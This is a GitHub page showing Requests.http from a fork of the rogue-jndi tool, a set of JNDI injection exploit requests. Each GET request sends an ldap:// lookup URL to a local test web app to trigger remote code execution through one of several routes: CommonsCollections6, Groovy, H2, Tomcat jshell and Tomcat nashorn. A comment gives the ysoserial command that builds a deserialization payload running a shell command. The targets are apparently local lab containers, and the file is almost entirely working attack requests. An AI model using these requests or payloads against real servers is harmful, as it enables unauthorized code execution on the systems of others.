forked from artsploit/rogue-jndi
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathRequests.http
23 lines (17 loc) · 1.26 KB
/
Requests.http
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
### Exploit Generic (via CommonsCollections6 gadget chain, --generic-payload-path must point to a valid file)
### For reference the command to generate the payload:
### java: 17.0.12-amzn
### $ java --add-opens java.base/java.util=ALL-UNNAMED -jar target/ysoserial-all.jar CommonsCollections6 "touch /usr/local/tomcat/temp/pwn.txt" > commonscollections6.bin
GET http://localhost:8080/commons-collections-6-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=generic
### Exploit Groovy
GET http://localhost:8080/groovy-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=groovy
### Exploit H2
GET http://localhost:8081/h2-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=h2
### Exploit Tomcat10-jshell
GET http://localhost:8082/tomcat-10-jshell-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=tomcat10
### Exploit Tomcat-jshell
GET http://localhost:8083/tomcat-9-jshell-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=tomcat-jshell
### Exploit Tomcat10-nashorn
GET http://localhost:8084/tomcat-10-nashorn-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=tomcat10
### Exploit Tomcat-nashorn
GET http://localhost:8085/tomcat-9-nashorn-1.0-SNAPSHOT/lookup?resource=ldap://host.docker.internal:1389/o=tomcat